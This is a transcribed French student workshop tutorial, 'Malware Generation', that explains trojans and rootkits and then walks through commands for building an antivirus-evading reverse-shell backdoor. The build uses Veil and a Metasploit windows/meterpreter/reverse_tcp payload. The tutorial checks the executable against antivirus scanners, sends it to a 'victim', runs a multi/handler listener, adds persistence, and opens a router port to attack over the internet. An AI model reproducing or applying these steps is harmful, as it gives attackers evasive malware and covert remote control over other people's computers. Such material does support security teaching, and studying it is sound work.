MALWARE GENERATION MABROUK ANOUAR (ISI ING 1) MKACHER FATEN (RT4) HSAN MAJDI (ESTI ING) ETTAYEB MOHAMED (ISETCOM) HNAYA MOHAMED (MPI) ATEF REBAI (MPI)

Transcription

1 MALWARE GENERATION MABROUK ANOUAR (ISI ING 1) MKACHER FATEN (RT4) HSAN MAJDI (ESTI ING) ETTAYEB MOHAMED (ISETCOM) HNAYA MOHAMED (MPI) ATEF REBAI (MPI)

2 Table des matières I) Présentation de l'atelier : ) Définition-Malware: ) Types:... 2 a) Qu'est ce qu'un cheval de Troie?... 2 b) Qu'est ce qu'un rootkit?... 4 II) Présentation des outils utilisés: ) Metasploit:... 5 a) Définition:... 5 b) Avantages : ) Veil:... 6 III) Un scénario de test: ) En LAN : ) En WAN : IV) Conclusion :

3 I) Présentation de l'atelier : Notre atelier consiste à la création d'un malware. 1) Définition-Malware: MALWARE GENERATION SECURILIGHT 2013 Un logiciel malveillant (en anglais, malware) est un logiciel développé dans le but de nuire à un système informatique Grosso modo, le mot Malware est le mot qui désigne à lui seul tous les types de logiciels malveillants. Il permet donc de désigner des logiciels tels que des Virus, des Vers, des Rogues, des Troyens des Rootkits... 2) Types: Voici les différents types de malwares existants : Parmi les malwares les plus utilisés on cite les chevaux de troie et les rootkits. a) Qu'est ce qu'un cheval de Troie? Relativement opposés aux virus et aux vers, les chevaux de Troie sont des programmes qui ne se dupliquent pas et qui prétendent être légitimes, mais qui sont réellement conçus pour mener des actions contre leurs victimes. Les chevaux de Troie sont appelés de cette manière car ils agissent comme le cheval de Troie de la mythologie grecque, en se faisant passer pour des programmes légitimes alors qu ils mènent des opérations malveillantes. Puisque les chevaux de Troie ne se reproduisent pas, ils ne se répandent pas. Mais grâce à l envergure croissante d Internet, il est désormais très facile d infecter un grand nombre d utilisateurs. 2

4 - Types des chevaux de Troie: Les chevaux de Troie se répartissent en plusieurs sous-catégories, et ont chacune leur mode de fonctionnement : -Les portes dérobées sont les plus dangereux et les plus répandus des chevaux de Troie. Il s'agit d'un utilitaire d'administration à distance permettant à l'attaquant de prendre le contrôle des ordinateurs infectés via un LAN ou Internet. Leur fonctionnement est similaire à ceux des programmes d'administration à distance légitimes à la différence que la porte dérobée est installée et exécutée sans le consentement de l'utilisateur. Une fois exécutée, elle surveille le système local de l'ordinateur et n'apparait que rarement dans le journal des applications actives. Elle peut notamment envoyer, réceptionner, exécuter, supprimer des fichiers ou des dossiers, ainsi que redémarrer la machine. Son objectif est de récupérer des informations confidentielles, exécuter un code malicieux, détruire des données, inclure l'ordinateur dans des réseaux de bots, etc. Les portes dérobées combinent les fonctions de la plupart des autres types de chevaux de Troie. Certaines variantes de portes dérobées sont capables de se déplacer, mais uniquement lorsqu'elles en reçoivent la commande de l'attaquant. -Les chevaux de Troie PSW recherchent les fichiers système qui contiennent des informations confidentielles (comme les mots de passe, les détails du système, les adresses IP, les mots de passe pour les jeux en ligne, etc.) puis envoient par mail les données recueillies à la personne malintentionnée. -Les chevaux de Troie cliqueurs redirigent les utilisateurs vers des sites Web ou d'autres ressources Internet. Pour cela, ils peuvent notamment détourner le fichier hosts (sous Windows). Ils ont pour but d'augmenter le trafic sur un site Web, à des fins publicitaires ; d'organiser une attaque par déni de service ; ou de conduire le navigateur web vers une ressource infectée (par des virus, chevaux de Troie, etc.). -Les chevaux de Troie droppers installent d'autres logiciels malveillants à l'insu de l'utilisateur. Le dropper contient un code permettant l'installation et l'exécution de tous les fichiers qui constituent la charge utile. Il l'installe sans afficher d'avertissement ni de message d'erreur (dans un fichier archivé ou dans le système d'exploitation). Cette charge utile renferme généralement d'autres chevaux de Troie et un canular (blagues, jeux, images, etc.) qui, lui, a pour but de détourner l'attention de l'utilisateur ou de lui faire croire que l'activité de l'injecteur est inoffensive. -Les chevaux de Troie proxy servent de serveur proxy. Ils sont particulièrement utilisées pour diffuser massivement des messages électroniques de spam. -Les chevaux de Troie espions sont des logiciels espions et des programmes d'enregistrement des frappes, qui surveillent et enregistrent les activités de l'utilisateur sur l'ordinateur, puis transmettent les informations obtenues (frappes du clavier, captures d'écran, journal des applications actives, etc.) à l'attaquant. -Les chevaux de Troie notificateurs sont inclus dans la plupart des chevaux de Troie. Ils confirment à leurs auteurs la réussite d'une infection et leur envoient (par mail ou ICQ) des informations dérobées sur l'ordinateur attaqué (adresse IP, ports ouverts, adresses de courrier électronique, etc.). 3

5 -Les bombes d'archives sont des fichiers archivés infectés, codés pour saboter l'utilitaire de décompression (par exemple, Winrar ou Winzip) qui tente de l'ouvrir. Son explosion entraîne le ralentissement ou le plantage de l'ordinateur, et peut également noyer le disque avec des données inutiles. Ces bombes sont particulièrement dangereuses pour les serveurs. -Les man in the browser infectent les navigateurs web b) Qu'est ce qu'un rootkit? Un rootkit est un terme anglais qui désigne un type de malware conçu pour infecter un PC et qui permet au pirate d installer une série d outils qui lui permettent d accéder à distance à un ordinateur. Le malware sera habituellement bien caché dans le système d exploitation et ne sera pas détecté par les logiciels anti-virus et autres outils de sécurité. Le rootkit peut contenir de nombreux outils malicieux tels qu un enregistreur de frappe, un programme de capture de mots de passe... Les rootkits agissent typiquement comme une porte dérobée qui permet au pirate de se connecter à distance à l ordinateur infecté quand il le souhaite ainsi que d installer ou de supprimer des components spécifiques. - types de rootkit: Les deux types de rootkits principaux sont les rootkits en mode utilisateur et ceux en mode noyau. Les rootkits en mode utilisateur sont conçus pour fonctionner au sein du système d exploitation de l ordinateur comme une application. Ils exécutent leur comportement malicieux en piratant les applications en fonctionnement sur l ordinateur ou en remplaçant la mémoire utilisée par une application. Il s agit du type de rootkit le plus commun. Les rootkits en mode noyau fonctionnent au niveau le plus profond du système d exploitation du PC et donnent au pirate une série de privilèges très puissants. Après l installation d un rootkit en mode noyau, un pirate obtient un contrôle total de l ordinateur compromis et la possibilité de faire tout ce qu il veut sur celui-ci. - Méthode d infection Les rootkits peuvent être installés en suivant différentes méthodes: Le vecteur d infection le plus courant est l utilisation d une vulnérabilité du système d exploitation ou d une application fonctionnant sur l ordinateur. On cible les vulnérabilités connues et inconnues du système d exploitation ainsi que celles des applications et utilisent un code d exploit afin d obtenir une position privilégiée dans l ordinateur ciblé. Ensuite, on installe le rootkit et les components leur permettant d accéder à l ordinateur à distance. Le code d exploit d une vulnérabilité peut être hébergé sur un site Web légitime qui a été compromis. Les clés USB infectées sont un autre vecteur d infection. On peut abandonner des clés USB sur lesquelles des rootkits sont cachés dans des endroits où elles ont de grandes chances d être trouvées et récupérées par les victimes. Dans certains cas, le rootkit utilisera des vulnérabilités de sécurité, mais dans d autres, il se fera passer pour une application légitime ou un fichier de la clé USB. 4

6 II) Présentation des outils utilisés: Dans ce tutorial, on va créer un Torjan (Backdoor) en utilisant les outils suivants : 1) Metasploit: a) Définition: Metsploit est un outil pour le développement et l exécution d exploits contre une machine distante, il permet de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l origine en langage de programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby. Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes informatiques afin de les protéger, ou par les hackers à des fins de piratage. Le msfconsole est probablement l'interface la plus populaire de la MSF. Il fournit une console centralisée "tout-en-un" et vous permet un accès efficace à la quasi-totalité des options disponibles dans le Framework Metasploit. Msfconsole peut sembler intimidant au début, mais une fois que vous apprendre la syntaxe des commandes, vous apprendrez à apprécier la puissance de l'utilisation de cette interface. b) Avantages : C'est la seule façon soutenue pour accéder à la plupart des fonctionnalités dans Metasploit. Fournit une interface basée sur la console au cadre Contient la plupart des fonctionnalités et est l'interface de MSF le plus stable Prise en charge complète de readline, tabulation, et la complétion des commandes Exécution de commandes externes dans msfconsole est possible Le msfconsole est lancé par une simple commande»msfconsole de la ligne de commande. 5

7 2) Veil: Veil est un outil conçu pour générer des charges Metasploit qui contournent les solutions anti-virus habituels. Veil est actuellement capable d'utiliser sept méthodes différentes pour faire 20 charges utiles différentes, qui toutes aboutissent à des connexions Meterpreter. Veil offre à l'utilisateur la possibilité d'utiliser soit Pyinstaller ou py2exe pour convertir leur charge utile de python dans un fichier exécutable. 6

8 III) Un scénario de test: 1) En LAN : Ouvrir un shell (interpréteur de commande) en cliquant sur l icône l écran. en haut de On doit d'abord installer Veil : Commencez par télécharger l'archive avec ce commande : >> wget Extraire avec le commande : >> unzip master.zip 7

9 Rendez vous dans le dossier "Veil-master" puis dans le dossier "setup" et exécutez "setup.sh" avec les commandes suivantes : >> cd Veil-master >> cd setup >>./setup.sh L installation va commencer maintenant : 8

10 On peut maintenant exécuter Veil avec les commandes suivantes : >> cd.. >>./Veil.py Ensuite,choisissez la commande list pour afficher la liste des 20 services offerts par Veil : 9

11 >> list Parmi ces 20 payloads utilisez celui n 13 pour encoder notre payload : >> use 13 L'étape suivante consiste à complier notre payload en un fichier éxécutable en tapant la commande : >> set complie_to_exe Y 10

12 Puis le générer avec le commande : >> generate A ce niveau, on utilisera msfvenom cet outil combine toutes les fonctionnalités de msfpayload et msfencode dans un seul outil en tapant : 11

13 >> 1 On tapant 2 fois sur TAB tous les payloads s'affichent comme vous voyez On va choisir un exemple de payload en tapant la commande : >> windows/meterpreter/reverse_tcp Entrez votre adresse IP locale : 12

14 Ensuite entrer le numéro de port : Donnez un nom à votre payload 13

15 Choisissez Pyinstaller pour convertir le payload exécutable autonome Python sous Windows, Linux, Mac OS X, Solaris et AIX : >> 1 Et voici votre payload "test1.exe" sous le dossier /veil-output/compiled : Notre payload est généré avec succès!!! 14

16 Avant d envoyer le malware à la machine victime, on va tester si il sera détecté par les antivirus. Pour faire cela on utilise le site qui regroupe les différents types d antivirus on obtient le résultat suivant : Il ne reste qu'envoyer notre «test1.exe» au victime et mettre un serveur en écoute: Ouvrir un shell (interpréteur de commande) en cliquant sur l icône de l écran et lancer msfconsole : en haut >> msfconsole Maintenant on exploitera notre payload par ces simples commandes : >> use exploit/multi/handler 15

17 Entrer le payload qu'on a utiliser avec Veil : [ Nous avons utiliser le payload «windows/meterpreter/reverse_tcp» ] >> set payload windows/meterpreter/reverse_tcp Entrer l'adresse IP de votre machine (dans notre exemple ) : >> set lhost

18 Entrer le numéro de port utilisé pour generer le payload : >> set lport 4444 Enfin taper la commande : >> exploit 17

19 Une fois le payload est exécuté sur la machine victime, la session meterpreter sera ouverte et on aura l'accès à la machine comme vous voyer : Persistance : Notre but c est de controler la machine victime de manière permanente et jusqu à là on peut ouvrir seulement la session une seule fois c'est-à-dire lorsque la machine victime redémarre on perd l accès. C est pour cela on a pensé a une solution de persistance faite dela façon suivante : 18

20 2) En WAN : On doit d'abord ouvrir un port sur le modem on va à la page de configuration de modem avec un navigateur : « Ensuite, NAT >> Port Forwarding et on choisit les paramètres suivantes : Application : on écrit le nom de l'application qu'elle va utiliser le port, Start to : le numéro de port, Protocol : on choisie TCP et UDP, IP adresse : on doit mettre notre IP locale, on suite cocher Enable et enregistrer, 19

21 Et voilà notre port est ouvert Maintenant on exécute Veil et on refait les mêmes étapes que précédemment. Lorsqu on arrive à définir les paramètres du payload utilisé, on a besoin de notre IP sur internet qu'on peut la trouver avec le site « Alors notre adresse IP sur Internet est : « » 20

22 Ensuite entrer le numéro de port ouvert sur le modem : Et voici votre payload "test_wan.exe" sous le dossier /veil-output/compiled : Notre payload est généré avec succes! Reste plus qu'a envoyer notre «test1.exe» à notre victime et mettre un serveur en écoute: >> msfconsole 21

23 >> use exploit/multi/handler >> set payload windows/meterpreter/reverse_tcp >> set lhost (notre adresse IP sur Internet ) >> set lport 4444 >> exploit Une fois le payload est exécuté sur la machine victime la session meterpreter sera ouverte et on aura accès à la machine. IV) Conclusion : Dans notre atelier «Malware Generation» On a pu découvrir le monde des malwares : leurs types et leurs modes de fonctionnements. On a pu utiliser des frameworks et des outils avancés pour générer des malwares puissants qui persistent dans la machine victime et qui surpassent les antivirus. Notre attaque est faite en WAN pour s approcher le maximum d une attaque réelle. 22